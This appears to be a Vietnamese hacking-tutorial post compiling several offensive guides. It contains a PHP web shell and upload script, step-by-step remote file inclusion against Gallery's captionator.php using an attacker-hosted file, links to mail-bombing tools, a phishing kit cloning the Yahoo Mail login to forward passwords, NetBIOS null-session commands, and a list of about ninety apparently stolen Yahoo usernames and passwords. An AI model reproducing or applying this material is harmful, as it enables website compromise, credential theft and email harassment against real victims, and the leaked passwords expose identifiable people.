_ Trước hết bạn hãy đăng ký một host miễn phí , tốt
nhất là bạn đăng ký ở brinkster.com cho dễ . Sau đó bạn
mở notepad và tạo file PHP với đoạn mã sau :

CODE

<?php

global $PHP_SELF;

echo "<html><body>

<form method=post action=$PHP_SELF?$QUERY_STRING>

<input type=text name=shell size=40>

<input type=hidden name=act value=shell>

<input type=submit value=Go name=sm>

</form>";

set_magic_quotes_runtime(1);

if ($act == "shell") {

echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";

system($shell);

echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";}

echo "</body></html>";

?>

Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau (
nhưng cùng chung một mã ) và đặt tên là :

+ shellphp.php : file này dùng để chạy shell trên victim host .

+ init.php : file này dùng để upload lên trang có host bạn
vừa tạo . ( Bạn hãy upload file init.php này lên sớm vì ta
sẽ còn sử dụng nó nhưng với đoạn mã khác , bạn quên
upload file này lên là tiêu )

Bạn hãy tạo thêm một file PHP với mã sau :

CODE

<?php

function handleupload() {

if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {

$filename = $_FILES['userfile']['tmp_name'];

print "$filename was uploaded successfuly";

$realname = $_FILES['userfile']['name'];

print "realname is $realname\n";

print "copying file to uploads dir ".$realname;

copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); // lưu ý
*PATH* chúng ta sẽ thay đổi sau

} else {

echo "Possible file upload attack:
filename".$_FILES['userfile']['name'].".";

}

}

if ($act == "upload") {

handleupload();

}

echo "<html><body>

<form ENCTYPE=multipart/form-data method=post
action=$PHP_SELF?$QUERY_STRING>

File:<INPUT TYPE=FILE NAME=userfile SIZE=35>

<input type=hidden name=MAX_FILE_SIZE value=1000000>

<input type=hidden name=act value=upload>

<input type=submit value=Upload name=sm>

</form>

</body></html>";

?>

Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload
lên trang Web của nạn nhân .

_ Tiếp theo Bạn vào Google, gõ "Powered by gallery" rồi enter,
Google sẽ liệt kê một đống những site sử dụng Gallery ,
bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau
để thử xem nó còn mắc lỗI Gallery hay không :

http://<tên trang Web của nạn
nhân>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tên
host bạn vừa đăng ký>/

Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía
trên cùng , bên phải của nó là ô lệnh chuyển tiếp có
chữ “Go” là coi như bạn đã tìm thấy được đốI
tượng rồi đó . Bây giờ bạn đã có thể gõ lệnh thông
qua ô chữ nhật đó để hack Web của nạn nhân .

Trước hết bạn hãy gõ lệnh “pwd” để xác định
đường dẫn tuyệt đối đến thư mục hiện thời rồi
nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng
ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD
đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ).

Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê
các thư mục con của nó . Bây giờ bạn hãy nhìn kết quả
, bạn sẽ thấy một đống các thư mục con mà ta đã
liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta
là tìm một thư mục có thể dùng để upload file upload.php
mà ta đã chuẩn bị từ trước do đó bạn hãy xác định
cùng tôi bằng cách nhìn vào những chữ cuốI cùng của
mỗi hàng kết quả :

+ Bạn hãy loại bỏ trường hợp các thư mục mà có dấu
“.” hoặc “..” vì đây là thư mục gốc hoặc là thư
mục ảo ( Nó thường được xếp trên cùng của các hàng
kết quả ) .

+ Bạn cũng loạI bỏ những hàng có chữ cuối cùng có
gắn đuôi ( VD như config.php , check.inc .v.v… ) vì đây là
những file chứ không phải là thư mục .

+ Còn lại là những thư mục có thể upload nhưng tôi
khuyên bạn nên chọn những hàng chứa tên thư mục mà có
chứa số lớn hơn 1 ( Bạn có thể xác định được chúng
bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy
vừa chắc chắn đây là thư mục không phải thư mục ảo
, vừa làm cho admin của trang Web đó khó phát hiện khi ta
cài file của ta vào . Tôi VD tôi phát hiện ra thư mục
“loveyou” có chứa 12 file có thể cho ta upload , như vậy
đường dẫn chính thức mà ta upload lên sẽ là :

/home/abc/xyz/Gallery/loveyou

Bây giờ bạn hãy vào account host của bạn, sửa nội dung
file init.php giống như mã của file upload.php, nhưng sửa
lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng
thời cũng chuẩn bị một file upload.php trên máy của bạn
với *PATH* là “” ( 2 dấu ngoặc kép ).

Bây giờ là ta đã có thể upload file upload.php lên trang Web
của nạn nhân được rồi , bạn hãy nhập địa chỉ sau
trên trình duyệt Web của bạn :

http://<tên trang Web của nạn
nhân>/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tên
trang Host bạn đã tạo từ đầu>/

Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật
và bên cạnh là có 2 nút lệnh , một là nút “brown” ,
một là nút “upload” . Nút “brown” bạn dùng để dẫn
đến địa chỉ file upload.php bạn đã chuẩn bị trên máy
của bạn , nút “upload” khi bạn nhấn vào đó thì nó
sẽ upload file upload.php lên trang Web của nạn nhân . Ok ,
bây giờ coi như bạn đã hoàn thành chặng đường hack Web
rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công
đối thủ như lấy database , password ( làm tương tự như
các bài hướng dẫn hack trước ) , nhưng các bạn chỉ nên
thực tập chứ đừng xoá database hay phá Web của họ. Nếu
là một hacker chân chính các bạn chỉ cần upload lên trang
Web dòng chữ : “Hack by ……..” là đủ rồi .

Cũng như những lần trước , các bạn có thành công hay
không cũng tuỳ thuộc vào sự may mắn và kiên trì nghiên
cứu vận dụng kiến thức của các bạn.

Trang web bom mail

Bob mail thi vao trang nay ma gui nay.Tien loi vi ko phai khai mail
server. http://members.lycos.co.uk/anhminhk42/bomb.php

http://www.yeu.cjb.net con neu ban muon gui bomb mail bang chuong
trinh thi vao cac trang WED ma minh post len ma gui:Ban vao lai xem cac
trang WED minh POST len deu dung tốt ca day,ko bi fire wall
dau...Chuc thanh cong.

1- Bomb Aenima2.0
http://haisport.topcities.com/bombkick/Aenima20.zip

2- X-Max 2000 http://www.tv-decoder.de/xmas.zip
3-Cac ban hay vao day de load cong cu danh bom:
http://www.elhacker.net/hacking.htm
4- Bom kabomb3 http://hackervtv4.topcities.com/kabomb3.htm

Tam thoi the thoi nhe : Bom XMAS 2000 la dinh nhat day ba con a`

Các bạn có thể down bomb từ đây về
http://haisport.topcities.com/bombkick/Aenima20.zip
http://haisport.topcities.com/bombkick/xmas2000.zip
http://haisport.topcities.com/bombkick/kabomb3.zip
http://haisport.topcities.com/bombkick/fmbomb.zip
http://haisport.topcities.com/bombkick/bombita.zip
http://haisport.topcities.com/bombkick/ebomber2002.zip
Ghét thằng nào thì chơi thằng đó đi , đừng bomb tui là
được
Lần sau tui không dám đưa địa chỉ bomb cho các bạn nữa
đâu
Các bạn vào đây để down MailBomber version8.9 về nè , nó
dùng được cho tất cả các Windown. Các bạn tìm hiểu
cách sử dụng loại Bomb này nha
http://www.softheap.com/download/bomber.zip

Hack pass yahoo

Hic xin chao cac ban . Lan nay minh xin gui den cac ban mot bai viet
thuc dung va co tinh hieu qua nhat . Do la van de ve cach lay trom
pass. Dang nhe tui cung khong thich cai tro` nay` dau nhung tu dung
thang ban tui no khieu chien tui a` ! Hye va bay gio` bat dau nhe :

Đầu tiên bạn hãy vào www.bravenet.com sau đó Click vào
"Join now" để đăng kí . Đăng kí để làm gì ? để no' cho
bạn 1 đọan Code rồi sau này những pass mà bạn hack đuợc
sẽ chuyển vào hòm thu của bạn chứ để làm gì nữa

Đăng kí trong bravenet cũng đơn giản lắm
Trước hết nó sẽ đòi bạn nhập e-mail của bạn vào sau
đó nó đòi bạn phải nhập vào mã kích họat mà nó gửi
cho bạn sau đó vào bước tiếp theo (mã này là một dãy
số kiểu như bạn là người thứ mấy thôi) .
Sau đó là việc các bạn điền các thông tin để đăng kí
(chú ý mã VN là 84)
Đăng kí thành công là khi bạn nhận được một danh sách
các dịch vụ free của Bravenet như : Counter, Form, Guestbook...

Để làm dc cách tôi nói là Fack Yahoo thì bạn phải vào
phần E-mail Form & QuickMailer (ở cuối trang danh sách) và tìm
mục Copy/paste code để được cấp một đoạn code về
E-mail Form (cái kiểu mà người ta hay dùng để người truy
cập có thể send e-mail trưc tuyến từ trang web của họ
đến địa chỉ thư của Admin á)
Đoạn code đó như sau : Code:
<!---------------- BEGIN BRAVENET CODE -------------->

<div align="center"><br /><br />
<form action="<http://pub18.bravenet.com/emailfwd/senddata.php>"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />
<table cellpadding="0" cellspacing="0" border="0"
bgcolor="#999999"><tr><td>
<table border="0" cellpadding="10" cellspacing="1"
bgcolor="#999999"><tr bgcolor="cornsilk"><td>
<font face="Verdana,Arial,Helvetica" size="1"><b>What is your
name?</b></font><br />
<input type="text" name="name" size="20" /><br />
<font face="Verdana,Arial,Helvetica" size="1"><b>Where are you
from?</b></font><br />
<input type="text" name="where" size="20" /><br>
<font face="Verdana,Arial,Helvetica" size="1"><b>E-mail
address?</b></font><br />
<input type="text" name="replyemail" size="20"><br />
<br /><div align="center">
<input type="submit" name="submit" value=" Send ">
<input type="reset" name="reset" value=" Clear ">
</div></td></tr></table></td></tr></table>
<br /><a href="http://www.bravenet.com/">
<img src="http://images.bravenet.com/brpics/formbutt.gif" border="0"
width="100" height="35" /></a>
</form></div>

+Nhưng bạn chỉ lấy phần đầu mà thôi tức là đoạn
này:
Code:
<form action="<http://pub18.bravenet.com/emailfwd/senddata.php>"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />

Bạn đối chiếu hai đoạn code trên sẽ rõ.
Chú ý: Cái ở trên là vd vì đó là của tôi, bạn sẽ có
1 dòng như vậy chỉ có điều số code Code:
<input type="hidden" name="usernum" value="1544102702" />

value="1544102702" của bạn sẽ khác của tôi (thế thì mới
send về hòm thư của ban được)

+ Lấy đuợc đọan Code roai` thì bây giờ làm tiếp buớc
sau , đó là tạo một trang Mail Yahoo giả .Mục đích của
việc này là giúp bạn có một trang Login giả giống y đúc
của Yahoo Mail về giao diện nhưng chỉ khác đường dẫn
mà thôi .(cái này đánh lừa các bạn mới vô nghề
checkmail) . Cách làm như sau :
- Mở trang www.mail.yahoo.com
- File => Save As => (đổi tên File thành fakeyahoo cho dễ nhớ)
rồi Save (Cách này dùng để lưu lại trang mail.yahoo.com vào
máy của bạn) Và bạn phải nhớ bạn đặt trang web này
ở đâu nha trên máy bạn. Nếu như bạn đặt tên trang web
vừa save về máy là fakeyahoo thì bạn sẽ có trên máy một
thư mục (đúng đường dẫn bạn chọn khi save) là
fakeyahoo_files .Đây là thư mục chứa các thứ còn lại
của trang mail.yahoo.com các ảnh hay code java của trang web và
một trang fakeyahoo.htm cùng đường dẫn với thư mục
fakeyahoo
- Đến đây ta được 1 file fakeyahoo.htm , mở file
fakeyahoo.htm ra .
=> click chuột phải => chọn View Source là ta đuợc đọan
CODE HTML trang Mail Yahoo giả. Cái này bạn sẽ dùng sau.

Vậy là bây giờ ta đã có 2 đọan CODE (1 là của Bravenet ,
2 là của Mail Yahoo) . Bây giờ ta chỉ việc chèn đọan Code
của Bravenet vào đọan Code của Mail Yahoo là những pass mà
ta hack đuợc sẽ Send về Mail của ta .

Cách chèn Code:
Các bạn chú ý đoạn đầu của Code Yahoo giả nha
Trích dẫn:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0022)<http://mail.yahoo.com/> -->
<HTML><HEAD>[/color]Các bạn chèn đoạn Code của Bravenet vào
đây<TITLE>Yahoo! Mail - The best free web-based email!</TITLE>
<META content="text/html; charset=windows-1252"
http-equiv=Content-Type>
<SCRIPT language=javascript src="Code_files/mc.js">
</SCRIPT>


Chú ý: các bạn chỉ cần quan tâm đến đoạn Code ngắn
này của Bravenet để chèn thôi , cái này là của tôi ,
tất nhiên cái của bạn sẽ khác nhưng cấu trúc là tương
tự.

Trích dẫn:
[color=green]<FORM
action=<http://pub35.bravenet.com/emailfwd/senddata.php>
encType=multipart/form-data method=post target=_blank><INPUT
name=usernum type=hidden value=2938586249> <INPUT name=cpv type=hidden
value=1>

Sau đó save htm lại thế là ok
Bạn chọn một cái host free nào đó và up file fakeyahoo.htm
này lên cũng như thư mục fakeyahoo. Cách thức đăng kí host
và cách upload bạn có thể tìm thấy ngoài trang chủ VTV4 :
http://vtv4online.net/home.php

Sau khi upload lên host bạn sẽ có một trang web giống y đúc
trang yahoo mail thật nhưng chỉ có địa chỉ web là không
giống mà thôi (cái này lấy tên theo host)
ví dụ tôi có địa chỉ
http://minhvtv4.web1000.com/fakeyahoo.htm chẳng hạn .
Cái này thì khó lừa mọi người lắm và bạn phải sang
bên http://dk3.com ay trang tạo sebdomain nào đó để tạo cho
bạn một địa chỉ ngắn kiểu http://mail1.yahoo1.dk3.com
chẳng hạn nhằm đánh lừa cách checkmailer ấy mà.Bạn vào
mục DK3 Subdomain Bạn kick tiếp vào Become a Member
Rồi đăng kí
Như hình sau : http://forumvtv4.net/nd/img/buoc_d10.jpg
Sau khi đăng kí bạn đăng nhập lại nha và sau khi hoàn
tất thì bạn cần hiểu :
Ở mục Short URL:http:// bạn điền vào tên mình muốn đặt
VD như VTV4.DK3.COM chẳng hạn .(tức là bạn điền tên vào
và nó sẽ là http://tên_bạn.dk3.com )
Còn Real URL bạn điền địa chỉ thực vào tức là địa
chỉ thưc trang chủ VD như
http://minhvtv4.web1000.com/fakeyahoo.htm sau cùng bạn chọn
Submit

Bây giờ thì bạn có thể dùng địa chỉ này để tung
hoành rồi đó nha. Và bạn cần dụ victim gõ đúng Password
vì cái trang này sẽ không f yahoo mà vào qua
http://www.brave.net/ vì thế ta chỉ lừa được victim 1 lần
thôi với victim biết máy tính còn với dan chat thì không
sao vì họ không hiểu đâu
Bạn sẽ nhận dc bức mail của bravenet gửi cho bạn ID và
pass của người bị bạn hacked password á. ID và Password sẽ
được gửi về hòm thư của bạn với người gửi là
not...@brave.net.com mailto:not...@brave.net.com

Các phương pháp cơ bản để đột nhập trong Lan

1- Kiểm tra IPC share: IPC viết tắt của Inter-Process
Communication, được dùng trong việc chia sẻ dữ liệu giữa
các ứng dụng và máy tính trên mạng

(NT/2K). Khi một máy được khởi động và log vào mạng,
hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp
cho các máy khác có thể nhìn thấy và

kết nối đến các chia sẻ trên máy này. Tuy nhiên, có
thể vì một lý do gì đó, người dùng xóa mất IPC$ share,
do đó, ta cần kiểm tra và tạo lại kết nối đến

IPC$ (gọi là null connection), nếu kết nối thành công, ta
có thể thấy được cả các chia xẻ đặc biệt được
ẩn (bao gồm C$, ADMIN$, IPC $, IPC$). Cụ thể,

dùng 1 trong 3 lệnh sau ở command prompt:

C:\>NET USE \\TARGET\IPC$ "" /USER:""

C:\>NET USE \\TARGET\IPC$ * /USER:

C:\>NET USE \\TARGET\IPC$ * /USER:""

trong đó: target là computername hoặc IP của máy bạn muốn
kết nối.

Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia
xẻ đó được ẩn và cách này chỉ áp dụng khi cổng
NetBios 139 của máy bạn và máy đích được mở.

Thường là đối với chia xẻ dạng này, bạn sẽ ít có
cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn
vẫn có thể khai thác được trong trường hợp các chia
xẻ đó không yêu cầu mật khẩu.

Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy
được:

C:\>net view \\TARGET

Lệnh net view sẽ liệt kê danh sách các share của máy
đích. Bạn dùng net view /? để biết thêm các cách dùng
khác.

Sau khi tạo được null connection và biết được các share
trên máy đối phương. Ðối với các share được bảo vệ
bằng username/password, bạn có thể dùng các tool sau để
thử crack chúng: Nat (NetBIOS Auditing Tool)...

Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương
trình xSharez scanner, cũng có thể cho bạn kết quả tương
tự.

2- Kiểm tra các cổng mở

Một cách khác để connect vào một máy là duyệt các port
mở của máy đích. Tuỳ loại port mà ta có cách thức khai
thác khác nhau, đơn giản nhất là dùng

telnet để connect vào máy thông qua port được mở, ví dụ:


C:\telnet anhnguyen 69

Một số port thông dụng:

21: FTP

23: Telnet proxy server

25: SMTP

110: POP3

139: NETBIOS

1080: SOCKS proxy

6667: IRC mapping

.....

Các công cụ để scan port có rất nhiều, ví dụ như:
superscan, elite, .... – Các bạn đọc có thể vào phần
công cụ Learning hacking For Viet để tài về

Sau khi scan được port nào đang opened, nếu port đó ngoài
những port trên, bạn thử dùng telnet để connect, nếu
thành công, bạn có thể vào command prompt shell của máy
đó.

3- Kiểm tra các lổ hổng của OS/Software

Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là
duyệt xem máy đó đang dùng OS gì, server gì, software nào.
Mỗi loại trên có các hole/vulnerability riêng, được tìm
thấy và mô tả chi tiết trong các site về security như
ntbugtraq, securityfocus, hoặc trong forum.

Từ những lổ hổng biết được, ta sử dụng các exploit
tương ứng để thâm nhập vào máy.

Lỗi sơ đẳng nhất trong các system software là lỗi về
cách đặt password, ví dụ như các máy Wins 9x có thể vào
mà không cần password (tất nhiên là khi đó, người log vào
sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như
với NT/2K, sau khi setup, password ngầm định của
adminnistrator là rỗng, nếu user không thay đổi pass cho
admin, thì ta có thể connect remote được dưới username là
administrator mà không cần pass.

Các lỗi còn lại thường là do các sai sót trong quá trình
viết chương trình mà vô tình tạo nên những lỗ hổng,
các đoạn code kiểm tra không đầy đủ, không stable...cho
phép người dùng thực thi các lệnh, chạy các chương
trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và
cách thường dùng để nhập là tìm cách send 1
trojant/backdoor (điển hình như Netcat...) đến máy đó,
chạy backdoor đó để mở 1 port nhất định nào đó, rồi
ta sẽ connect remote vào port đó.

Còn đây là pass yahoo mà tôi đã Hack

alone_princess nhoanhnhieulamanhhaioi
alone_princess2006 nhoanhnhieulamanhhaioi
anhchangdanghi_11355 123456
anhhungthoinay_110 vaonhaban
anhkhongmuonxaem_a3000 669632
anhphailamsao_anhphailamsao74 669623
anhsaodem_xq 151986
anhsedoiemve_manh huyenhahoa
anhtrangbuoncdl03 123456
anhvan28 chitdao
baby_friend2005_5002 2091989
baby_love2005_5002 2091989
batnapquantainb thangthuy
binhdinh_queem2004 tinhemmaimai22
black_list_hunter281 cachivang
cobankoten_khotinh 1541984
cohangxom71 1541984
conloc_tinhyeu_99999 201082
cuoctinhbuon2003_22 tinhemmaimai22
do_thevn 0350873485
do000 vaonhaban
emsock_trumxomchua_choixike emmaiyeuanh
gacon085 123456
giacmongtinhvang tinhmuonkiep
giacmotinhhong 14241124
giotlebuon26 123123
giotnuocmatchaynguoc680 0900337
guarhdianangel_3010 873010
hanhtrinhxuyenviet_037 1541984
haytinloianhnoi_4000 6569630
hoanghai1980 0650660570
hoangson3120 0900337
hoangtucua_thienduongxanh 1541984
hoaphonglan273 123456
hongduc272 nhotatca
huongthususungsuong nhovemientrung
kebaotinh2005 lonlon
kiem0403 buukiem
kiss_love2003_2003 147963
kyniem_qn2002 quangngainho
langtu_muon_co_duoc_em 123456
letantai16 lamtruong
love12a4cvant0304 zxcvbn
masotinhyeu1325 25251325
mazcukj trangusa
minhcung_yeuanhnhe87_hynt_nd haiyen
ngoisaomayman_ptm fanmen
nguoihoi_emmuonquayve_vn88 777888999
nhanhlancodon_nd_1987 1381987
nho_em11067 123456
nho_nguoiyeu_2008 123456
nhoemnhieu82_82 771982
noilongbiettocungai_nb thangthuy
phanboidoiem 200599
qtuanc003 ngayeudau
quangnam_yeuthuong2006 669620
quangthien203 775209
Quangtue_ huynh 2091987
saolai_phutoi 2631983
shesy84113 841130
shivakl1987 8858965
spypota_25685 810256
sv_ngheo405a banglangtimnx
tamthan110 toyota
thanhthao2003vn80 tranthihoi
thienduonglaban 12345+
thuhong132005 camthien
thuhuong_nb2005 21061988
tieuphiyen_hynt_nd 2271987
tinhanhtraoem802004 25251325
tinhyeuchuatimthay_1988 182425
toicodonveem lehongduc
trai_thanhhoa_2005 180285
traidanchoi_yeugainhay 2551985
trainhangheo_thichxaihanghieu 25251325
vangbongmotthoi5000 chuabietyeu
vangtrangcodon_0105_cuaanhoi 00000000
vangtrangkhoc_longphiyen87 haiyen
VEDAU76011 123456
vietnam_quehuongtoi_36 1541984
visao_vayem2002 hienoi
vivafreedom405 besamemucho
xaque_nhonguoiyeu 123456
cochunho_chanhche 2421987
cobehaihuocvadethuong 123456
nothing8138 242005
luuthailong 8651358
toi_mat_toi_boi_vi_khong_con_yeu vanlinh
phatrachgia_phatrachgia 26-9-86

Trở về đầu trang

Sưu tầm Và biên soạn :

vycs...@gmail.com

king...@gmail.com


--------------------------------------------------------------------------------

Reply all
Reply to author
Forward
0 new messages